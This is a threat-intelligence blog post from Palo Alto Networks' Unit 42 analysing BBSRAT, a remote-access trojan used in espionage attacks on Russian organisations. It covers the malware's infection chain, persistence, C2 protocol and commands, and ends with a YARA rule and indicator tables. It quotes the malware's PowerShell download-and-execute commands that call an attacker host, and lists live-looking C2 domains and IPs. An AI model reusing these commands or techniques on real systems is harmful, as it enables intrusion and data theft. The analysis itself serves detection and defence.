[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 10 min read

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Bryan Lee](https://unit42.paloaltonetworks.com/author/bryanlee/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:December 22, 2015

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [BBSRAT](https://unit42.paloaltonetworks.com/tag/bbsrat/)
  * [Microsoft Office](https://unit42.paloaltonetworks.com/tag/microsoft-office/)
  * [PlugX](https://unit42.paloaltonetworks.com/tag/plugx/)
  * [Roaming Tiger](https://unit42.paloaltonetworks.com/tag/roaming-tiger/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/?pdf=download&lg=en&_wpnonce=1628116e08 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/?pdf=print&lg=en&_wpnonce=1628116e08 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=BBSRAT%20Attacks%20Targeting%20Russian%20Organizations%20Linked%20to%20Roaming%20Tiger&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fbbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fbbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fbbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger%2F&title=BBSRAT%20Attacks%20Targeting%20Russian%20Organizations%20Linked%20to%20Roaming%20Tiger "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fbbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger%2F&text=BBSRAT%20Attacks%20Targeting%20Russian%20Organizations%20Linked%20to%20Roaming%20Tiger "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fbbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=BBSRAT%20Attacks%20Targeting%20Russian%20Organizations%20Linked%20to%20Roaming%20Tiger%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fbbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger%2F "Share in Mastodon")
  In late 2014, [ESET presented an attack campaign](https://2014.zeronights.org/assets/files/slides/roaming_tiger_zeronights_2014.pdf) that had been observed over a period of time targeting Russia and other Russian speaking nations, dubbed "Roaming Tiger". The attack was found to heavily rely on RTF exploits and at the time, thought to make use of the PlugX malware family.

ESET did not attribute the attacks to a particular attack group, but noted that the objective of the campaign was espionage and general information stealing. Based on data collected from Palo Alto Networks [AutoFocus](https://www.paloaltonetworks.com/products/platforms/subscriptions/autofocus.html) threat intelligence, we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe, with a concentration of attacks in late October and continuing into December.

The adversaries behind these attacks continued to target Russia and other Russian speaking nations using similar exploits and attack vectors. However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool "BBSRAT."

### Targeting and Infrastructure

As described in earlier reports on "Roaming Tiger", the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. The files exploit the well-known Microsoft Office vulnerability, CVE-2012-0158, to execute malicious code in order to take control of the targeted systems.

[![BBSRAT1](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT1-500x392.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT1.png)

Figure 1 Spear-phishing email delivering BBSRAT

In one case, the adversary impersonated an individual from the organization Vigstar, a Russian-based research organization in charge of the development of satellite communications and special purpose wireless devices for the Russian Federation's defense and security agencies. The targeted email address appeared to be a Gmail account associated with Vigstar as well, and was found on a job board website for a job opening at Vigstar.

The rough translation of the body of the email is as follows:

*I send you a "list of international exhibitions of military, civil and dual-purpose, conducted in 2015 on the territory of the Russian Federation and foreign states." Waiting for your reply!*

Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015.

[![BBSRAT2](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT2-500x351.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT2.png)

Figure 2 Decoy document that is opened after the malicious document has infected the system

In more recent months, we have identified several other potential Russian victims using AutoFocus. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the "Roaming Tiger" campaign, including transactiona\[.\]com and futuresgold\[.\]com. Interestingly, all of the previously published C2 domains have significant overlap amongst the hashes and IPs while C2s for BBSRAT contain no overlap at all. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each of the intended targets.

[![BBSRAT3](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT3-500x474.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT3.png)

Figure 3 Command and control infrastructure

### BBSRAT Malware Analysis

#### Deployment Technique \#1

BBSRAT is typically packaged within a portable executable file, although in a few of the observed instances, a raw DLL was discovered to contain BBSRAT. When the dropper first runs, it will generate a path in the %TEMP% directory. The generated filename is 10-16 uppercase alphabetic characters, and ends with a '.TMP' file extension. The dropper will continue to write an embedded cab file in this location.

[![BBSRAT4](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT4-500x178.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT4.png)

Figure 4 Header of CAB file dropped by BBSRAT

The malware will proceed to create one of the following directories depending on what version of Microsoft Windows is running on the target machine:

* %ALLUSERSPROFILE%\\SSONSVR
* %ALLUSERSPROFILE%\\Application Data\\SSONSVR

Using the built-in [expand.exe utility](https://support.microsoft.com/en-us/kb/80751) provided by Microsoft Windows, the dropper executes the following command, which will expand the CAB file and write the results to the provided directory:

*expand.exe "%TEMP%\\\[temp\_file\]" Destination "\[chosen\_path\]\\SSONSVR"*

This results in the following three files being written to the SSONSVR directory:

* aclmain.sdb
* pnipcn.dll
* ssonsvr.exe

The 'ssonsvr.exe' file is a legitimate Citrix executable that will be used to [sideload](https://attack.mitre.org/wiki/DLL_side-loading) the malicious 'pnipcn.dll' file. The 'aclmain.sdb' file contains code that will eventually be loaded by the 'pnipcn.dll' file.

The malware finally executes 'ssonsvr.exe' via a call to [ShellExecuteW](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx>).

[![BBSRAT5](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT5-500x105.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT5.png)

Figure 5 Execution flow of dropper expanding CAB file

When 'ssonsvr.exe' is executed, and the pnipcn.dll file is loaded, it will begin by identifying the path to msiexec.exe, by expanding the following environment string:

*%SystemRoot%\\System32\\msiexec.exe*

It will then spawn a suspended instance of msiexec.exe in a new process. The malware proceeds to load code from the 'aclmain.sdb' file and performs process hollowing against this instance of msiexec.exe prior to resuming the process.

[![BBSRAT6](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT6-500x79.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT6.png)

Figure 6 Sideloading execution flow

In order to ensure persistence, the following registry key is written on the victim's machine:

*HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe : \[path\_to\_ssonsvr.exe\]*

#### Deployment Technique \#2

In the most recently observed sample of BBSRAT found in AutoFocus, the Trojan was deployed via a downloader that used the [Invoke-ReflectivePEInjection.ps1](https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1) script from the PowerSploit framework.

When the downloader executes, it will first decrypt the following two strings using a 5-byte XOR key of "\\x01\\x02\\x03\\x04\\x05":

*"powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://testzake\[.\]com/IR.ps1');Invoke-ReflectivePEInjection -PEUrl http://testzake\[.\]com/s.exe"*

*"C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://testzake\[.\]com/IR.ps1');Invoke-ReflectivePEInjection -PEUrl http://testzake\[.\]com/s.exe"*

These strings are then sequentially executed via calls to WinExec. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. The commands in question will download an executable file and run it within the context of the powershell process.

When the above commands are executed, the downloader will initially download the 'IR.ps1' powershell script from the specified URL:

[![BBSRAT7](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT7-500x234.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT7.png)

Figure 7 Downloader downloading the Invoke-ReflectivePEInjection PowerSploit script

This Powershell script appears to have been pulled directly from the PowerSploit framework, with no modifications made. The malware then invokes this script with a URL that points to an additional executable file. This downloaded executable contains a copy of the BBSRAT malware family.

The downloader proceeds to drop either a 32-bit or 64-bit DLL file that will execute the two previously stated Powershell commands when the DLL is loaded. This DLL is dropped to one of the following locations:

*%SYSTEMROOT%\\web\\srvcl32.dll*

*%APPDATA%\\web\\srvcl32.dll*

Additionally, the following registry keys are set depending on the system's CPU architecture:

*HKU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\\ThreadingModel - "Both"* *HKU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\\Default - \[path\_to\_srvcl32.dll\]*

*HKLM\\SOFTWARE\\Classes\\CLSID\\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\\InprocServer32\\ThreadingModel - "Both"* *HKLM\\SOFTWARE\\Classes\\CLSID\\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\\InprocServer32\\Default - \[path\_to\_srvcl32.dll\]*

The COM object for {42aedc87-2188-41fd-b9a3-0c966feabec1} is specific to 'MruPidlList', while the COM object for {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} is specific to 'Microsoft WBEM New Event Subsystem'. This ensures that the DLL specified will load when Microsoft Windows starts. It is a technique that was used by the [ZeroAccess rootkit](https://nakedsecurity.sophos.com/2012/06/06/zeroaccess-rootkit-usermode/) when it initially surfaced.

#### BBSRAT Execution

After being loaded using one of the two techniques discussed, BBSRAT malware begins execution by loading the following libraries at runtime:

* ntdll.dll
* kernel32.dll
* user32.dll
* advapi32.dll
* gdi32.dll
* ws2\_32.dll
* shell32.dll
* psapi.dll
* Secur32.dll
* WtsApi32.dll
* Netapi32.dll
* Version.dll
* Crypt32.dll
* Wininet.dll

The following mutex is then created to ensure a single instance of BBSRAT is running at a given time:

*Global\\GlobalAcProtectMutex*

Throughout the execution of BBSRAT, it will dynamically load functions prior to calling them, as seen in the example below demonstrating BBSRAT making a call to the WSAStartup function:

[![BBSRAT8](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT8-500x240.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/BBSRAT8.png)

Figure 8 BBSRAT calling WSAStartup function

The malware proceeds to parse the stored embedded network configuration and spawns a series of threads responsible for network communication. This includes a series of HTTP or HTTPS requests, such as the following:

*GET /bbs/1/forum.php?sid=1 HTTP/1.1*  
*Cookie: A46A8AA9-D7D6-43FB-959DC96E*  
*Content-Length:*  
*User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1)*  
*Connection: Keep-Alive*  
*Host: transactiona\[.\]com*  
*Cache-Control: no-cache*  
*Accept: \*/\**  
*Content-Type:*

In the above example, the '1' used both in the URI and the sid GET parameter is a global incremental counter. Every subsequent request made by BBSRAT increments this counter by one. Additionally, all variants of BBSRAT we have found use the same URL for command and control (C2) communication.

When first executed, the malware will exfiltrate data about the victim's machine via a POST request to the '/bbs/\[counter\]/forum.php?sid=\[counter\]' URL. All network data sent via POST requests uses a custom binary structure, as defined as the following:  
struct network\_header { DWORD random; DWORD hardcoded0; DWORD hardcoded1; DWORD command; DWORD length\_of\_compressed\_data; DWORD length\_of\_decompressed\_data; DWORD unknown2; BYTE compressed\_data\[\]; };

|-------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | struct network\_header { DWORD random; DWORD hardcoded0; DWORD hardcoded1; DWORD command; DWORD length\_of\_compressed\_data; DWORD length\_of\_decompressed\_data; DWORD unknown2; BYTE compressed\_data\[\]; }; |

The compressed\_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data:  
def decrypt(data): out = \[\] for x in data: t = (ord(x) - 23) t1 = (t ^ 62) t2 = (t1 + 23) \& 0xFF out.append(chr(t2)) return out

|-----------------|-------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 | def decrypt(data): out = \[\] for x in data: t = (ord(x) - 23) t1 = (t ^ 62) t2 = (t1 + 23) \& 0xFF out.append(chr(t2)) return out |

The following data structure holds the victim's information that is uploaded by BBSRAT:  
struct victim\_information { DWORD static\_value; DWORD major\_version; DWORD minor\_version; DWORD build\_number; DWORD platform\_id; DWORD default\_locale; DWORD unknown; DWORD local\_ip\_address; DWORD running\_as\_64\_bit; DWORD random; DWORD unknown2; DWORD struct\_length; DWORD struct\_with\_not\_used\_length; DWORD struct\_with\_username\_length; DWORD struct\_with\_group\_length; DWORD unknown3; DWORD struct\_with\_hostname\_length; WCHAR not\_used\[??\]; WCHAR username\[??\]; WCHAR group\[??\]; WCHAR hostname\[??\]; };

|----------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | struct victim\_information { DWORD static\_value; DWORD major\_version; DWORD minor\_version; DWORD build\_number; DWORD platform\_id; DWORD default\_locale; DWORD unknown; DWORD local\_ip\_address; DWORD running\_as\_64\_bit; DWORD random; DWORD unknown2; DWORD struct\_length; DWORD struct\_with\_not\_used\_length; DWORD struct\_with\_username\_length; DWORD struct\_with\_group\_length; DWORD unknown3; DWORD struct\_with\_hostname\_length; WCHAR not\_used\[??\]; WCHAR username\[??\]; WCHAR group\[??\]; WCHAR hostname\[??\]; }; |

BBSRAT accepts many possible commands that the C2 server can provide. These commands are sent as a response to the GET beacons that are continually requested via either HTTP or HTTPS. The following commands and sub-commands have been identified:

|-------------|-----------------|----------------------------------------------|
| **Command** | **Sub-command** | **Description**                              |
| 0x110010    | N/A             | Beacon                                       |
| 0x110011    | N/A             | Uninstall/Kill Malware                       |
| 0x110020    | N/A             | Upload Victim Information                    |
| 0x110064    | 0x2             | Execute Command and Return Response          |
| 0x110064    | 0x4             | Unknown                                      |
| 0x110064    | 0x5             | Execute Shellcode                            |
| 0x110066    | 0x7             | Query Service Configuration                  |
| 0x110066    | 0x9             | Start Service                                |
| 0x110066    | 0xa             | Stop Service                                 |
| 0x110066    | 0xb             | Delete Service                               |
| 0x110066    | 0xc             | Change Service Configuration                 |
| 0x110063    | 0xd             | Enumerate Running Processes                  |
| 0x110063    | 0xf             | Kill Process                                 |
| 0x110063    | 0x10            | Get Process Information                      |
| 0x110063    | 0x12            | Free Library for Specified Process           |
| 0x110065    | 0x1b            | Execute Command Quietly                      |
| 0x110065    | 0x1e            | Send Input to Console                        |
| 0x110065    | 0x1f            | Execute Shellcode                            |
| 0x110061    | 0x20            | List Drive Information                       |
| 0x110061    | 0x21            | List File Information For Given Directory    |
| 0x110061    | 0x23            | Write File                                   |
| 0x110061    | 0x24            | Read File                                    |
| 0x110061    | 0x25            | List File Information For Given Directory    |
| 0x110061    | 0x27            | Perform File Operation via SHFileOperation() |
| 0x110061    | 0x28            | Delete File                                  |
| 0x110061    | 0x29            | Create Directory                             |
| 0x110061    | 0x2a            | Shell Execute                                |

Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers.

### Conclusion

As in many of the previous articles regarding espionage-motivated adversaries and possible nation-state campaigns, what is being observed in this attack campaign is a continued operation and evolution by the adversary even after its tactics, techniques, and procedures (TTPs) have become public knowledge. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook. We urge organizations to use the data from Unit 42 and other threat intelligence sources is paramount to proactively secure themselves and prevent attacks.

[WildFire](https://www.paloaltonetworks.com/products/technologies/wildfire.html) properly classifies BBSRAT malware samples as malicious. We have released DNS signatures to block access to the C2 domain names included in this report. AutoFocus users can explore these attacks using the [BBSRAT](https://autofocus.paloaltonetworks.com/#/tag/Unit42.BBSRAT) malware family tag.

### Appendix

#### YARA Rule

rule bbsrat { meta: author = "Tyler Halfpop" company = "Palo Alto Networks" last\_updated = "12-16-15" strings: $sa0 = "%ALLUSERSPROFILE%\\\\SSONSVR" fullword wide $sa1 = "%ALLUSERSPROFILE%\\\\Application Data\\\\SSONSVR" fullword wide $sa2 = "\\\\ssonsvr.exe" fullword wide $oa0 = { 83 E8 01 88 0C 04 75 F8 8B 44 24 40 89 4C 24 18 89 4C 24 1C 89 4C 24 30 89 4C 24 34 89 4C 24 20 89 4C 24 38 8D 0C 24 51 C7 44 24 04 3C 00 00 00 C7 44 24 08 40 00 00 00 C7 44 24 10 70 20 40 00 C7 44 24 14 A0 20 40 00 89 44 24 18 FF 15 54 20 40 00 85 C0 75 04 83 C4 3C C3 } $oa1 = { 75 11 5F 5E B8 0D 00 00 00 5B 81 C4 ?? 07 00 00 C2 10 00 53 68 80 00 00 00 6A 02 53 6A 02 6A 02 8D 54 24 ?? 52 89 5C 24 30 FF 15 38 20 40 00 } $sb0 = "%systemroot%\\\\Web\\\\" $sb1 = "srvcl32.dll" $ob0 = { B8 67 66 66 66 F7 E9 D1 FA 8B C2 C1 E8 1F 03 C2 8D 04 80 8B D1 2B D0 8A 44 94 04 30 81 08 58 40 00 41 3B CE 7C DA B8 08 58 40 00 5E 83 C4 14 C3 } $ob1 = { 8D 84 24 18 02 00 00 50 C7 84 24 1C 02 00 00 94 00 00 00 FF 15 4C 20 40 00 8B 8C 24 20 02 00 00 0F B7 94 24 1C 02 00 00 C1 E9 10 0B CA 83 F9 06 0F 85 7F 00 00 00 } condition: uint16(0) == 0x5a4d and filesize \< 300KB and (all of ($sa\*) or all of ($oa\*) or all of ($sb\*) or all of ($ob\*)) }

|----------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | rule bbsrat { meta: author = "Tyler Halfpop" company = "Palo Alto Networks" last\_updated = "12-16-15" strings: $sa0 = "%ALLUSERSPROFILE%\\\\SSONSVR" fullword wide $sa1 = "%ALLUSERSPROFILE%\\\\Application Data\\\\SSONSVR" fullword wide $sa2 = "\\\\ssonsvr.exe" fullword wide $oa0 = { 83 E8 01 88 0C 04 75 F8 8B 44 24 40 89 4C 24 18 89 4C 24 1C 89 4C 24 30 89 4C 24 34 89 4C 24 20 89 4C 24 38 8D 0C 24 51 C7 44 24 04 3C 00 00 00 C7 44 24 08 40 00 00 00 C7 44 24 10 70 20 40 00 C7 44 24 14 A0 20 40 00 89 44 24 18 FF 15 54 20 40 00 85 C0 75 04 83 C4 3C C3 } $oa1 = { 75 11 5F 5E B8 0D 00 00 00 5B 81 C4 ?? 07 00 00 C2 10 00 53 68 80 00 00 00 6A 02 53 6A 02 6A 02 8D 54 24 ?? 52 89 5C 24 30 FF 15 38 20 40 00 } $sb0 = "%systemroot%\\\\Web\\\\" $sb1 = "srvcl32.dll" $ob0 = { B8 67 66 66 66 F7 E9 D1 FA 8B C2 C1 E8 1F 03 C2 8D 04 80 8B D1 2B D0 8A 44 94 04 30 81 08 58 40 00 41 3B CE 7C DA B8 08 58 40 00 5E 83 C4 14 C3 } $ob1 = { 8D 84 24 18 02 00 00 50 C7 84 24 1C 02 00 00 94 00 00 00 FF 15 4C 20 40 00 8B 8C 24 20 02 00 00 0F B7 94 24 1C 02 00 00 C1 E9 10 0B CA 83 F9 06 0F 85 7F 00 00 00 } condition: uint16(0) == 0x5a4d and filesize \< 300KB and (all of ($sa\*) or all of ($oa\*) or all of ($sb\*) or all of ($ob\*)) } |

#### BBSRAT Samples

|------------------|------------------------------------------------------------------|
| MD5              | EF5FA2378307338D4E75DECE88158D77 (Sample Analyzed)               |
| SHA1             | 574230D89EABDE0B6F937CD718B3AD19BB4F5CE3                         |
| SHA256           | FC4B465EE8D2053E9E41FB0A6AE32843E4E23145845967A069E584F582279725 |
| Compile Time     | 2014-12-26 17:17:00 UTC                                          |
| Network Protocol | HTTPS                                                            |
| C2 Server(s)     | transactiona\[.\]com  financenewsru\[.\]net                |

|------------------|-------------------------------------------------------------------------------------------|
| MD5              | 2254A1CA05DB87D9D58A71DDB97C7395                                                          |
| SHA1             | 65B17D3FF68D25392A9B0B9E25A275540DFB4E8D                                                  |
| SHA256           | 567A5B54D6C153CDD2DDD2B084F1F66FC87587DD691CD2BA8E30D689328A673F                          |
| Compile Time     | 2015-11-04 07:14:33 UTC                                                                   |
| Network Protocol | HTTPS                                                                                     |
| C2 Server(s)     | jowwln\[.\]cocolco\[.\]com  pagbine\[.\]ofhloe\[.\]com cdaklle\[.\]housejjk\[.\]com |

|------------------|------------------------------------------------------------------|
| MD5              | 74A41C62D9EC1164AF82B802DA3E8B3E                                 |
| SHA1             | D390E0965823E42584F2799EF0E8161A6540AF3E                         |
| SHA256           | 77A2E26097285A794E42C9E813D14936D0E7A1DD3504205DD6B28A71626F8C3C |
| Compile Time     | 2015-11-04 07:14:33                                              |
| Network Protocol | HTTPS                                                            |
| C2 Server(s)     | kop\[.\]gupdiic\[.\]com                                          |

|------------------|------------------------------------------------------------------|
| MD5              | C17534E4B61C08A7646CDC64574B429B                                 |
| SHA1             | 931BAB999568C228616430A5AEDFEDFC34E1F151                         |
| SHA256           | 61A692E615E31B97B47A215479E6347FBD8E6E33D7C9D044766B4C1D1AE1B1FB |
| Compile Time     | 2015-11-04 07:14:33 UTC                                          |
| Network Protocol | HTTPS                                                            |
| C2 Server(s)     | herman\[.\]eergh\[.\]com                                         |

|------------------|------------------------------------------------------------------|
| MD5              | C7C79393E762E7ED925F42D3C899BA60                                 |
| SHA1             | 7406B11851200D0ADA1A8334107182D636738CE5                         |
| SHA256           | B1737F3A1C50CB39CD9938D5EC3B4A6A10B711F17E917886481C38967B93E259 |
| Compile Time     | N/A                                                              |
| Network Protocol | HTTP                                                             |
| C2 Server(s)     | 211.44.42\[.\]55                                                 |

|------------------|------------------------------------------------------------------------------------------------------|
| MD5              | 0EA888E970345B2FBFD74B369FE46DDD                                                                     |
| SHA1             | EB4F9BDE2FFAE863E0D7AD5848A758D59224C3F7                                                             |
| SHA256           | 56D878EDD61176CA30D4A41555671161158E94E8A50E5482985F42C4E4843CB5                                     |
| Compile Time     | 2015-08-25 09:33:57 UTC                                                                              |
| Network Protocol | HTTPS                                                                                                |
| C2 Server(s)     | crew\[.\]wichedgecrew\[.\]com  blueway\[.\]garmio-drive\[.\]com helloway\[.\]floretdog\[.\]com |

|------------------|---------------------------------------------------------------------------------------------|
| MD5              | FA944818A939456A7B6170326C49569F                                                            |
| SHA1             | 0EB3AE28A7A7D97ABA30DA4E8EB0A4AB36EFD035                                                    |
| SHA256           | 22592A32B1193587A707D8B20C04D966FE61B37F7DEF7613D9BB91FF2FE9B13B                            |
| Compile Time     | 2015-08-25 09:33:57 UTC                                                                     |
| Network Protocol | HTTPS                                                                                       |
| C2 Server(s)     | panaba\[.\]empleoy-plan\[.\]com  kop\[.\]gupdiic\[.\]com peak\[.\]measurepeak\[.\]com |

|------------------|------------------------------------------------------------------|
| MD5              | 896691AE546F498404F5884607D6EB50                                 |
| SHA1             | 91A176EB5B2436762B9898075EC66042E33615A3                         |
| SHA256           | 13D0BD83A023712B54C1DD391DFC1BC27B22D9DF4FE3942E2967EC82D7C95640 |
| Compile Time     | N/A                                                              |
| Network Protocol | HTTP                                                             |
| C2 Server(s)     | 211.44.42\[.\]55                                                 |

|------------------|------------------------------------------------------------------|
| MD5              | A78B9438117963A9A18B2F056888498B                                 |
| SHA1             | 98E79C065DB88B4686AB5B7C36C4524333D64C48                         |
| SHA256           | E049BD90028A56B286F4B0B9062A8DF2AB2DDF492764E3962F295E9CE33660E3 |
| Compile Time     | 2014-12-26 17:17:00 UTC                                          |
| Network Protocol | HTTP                                                             |
| C2 Server(s)     | 211.44.42\[.\]55  support.yandexmailru\[.\]kr              |

|------------------|---------------------------------------------------------------------------------------------|
| MD5              | B4927EAC9715014E17C53841FEEDF4E1                                                            |
| SHA1             | 26E8CFD13175B67C12FC72A11FBDBC749F0B61C0                                                    |
| SHA256           | 2D81D65D09BF1B864D8964627E13515CEE7DEDDFBD0DC70B1E67F123AB91421E                            |
| Compile Time     | 2014-12-26 17:17:00 UTC                                                                     |
| Network Protocol | HTTPS                                                                                       |
| C2 Server(s)     | kop\[.\]gupdiic\[.\]com  panaba\[.\]empleoy-plan\[.\]com peak\[.\]measurepeak\[.\]com |

|------------------|---------------------------------------------------------------------------------------|
| MD5              | 41A02CAF0A0D32FAD5418425F9973616                                                      |
| SHA1             | CC83EA6EF4763F24193D56359590BB34127DD36E                                              |
| SHA256           | 7438ED5F0FBE4B26AFED2FE0E4E4531FC129A44D8EA416F12A77D0C0CD873520                      |
| Compile Time     | 2015-08-25 09:33:57 UTC                                                               |
| Network Protocol | HTTPS                                                                                 |
| C2 Server(s)     | herman\[.\]eergh\[.\]com  prdaio\[.\]unbrtel\[.\]com loomon\[.\]gupdicc\[.\]com |

|------------------|------------------------------------------------------------------|
| MD5              | AA59EE1E40D22BD22CEE19B8B6A17DF3                                 |
| SHA1             | 963E0AD3EC717253A8E74F45D3C552107D6ECACA                         |
| SHA256           | 6FAE5305907CE99F9AB51E720232EF5ACF1950826DB520A847BF8892DC9578DE |
| Compile Time     | 2014-12-26 17:17:00 UTC                                          |
| Network Protocol | HTTPS                                                            |
| C2 Server(s)     | winwordupdate\[.\]dynu\[.\]com                                   |

|------------------|------------------------------------------------------------------|
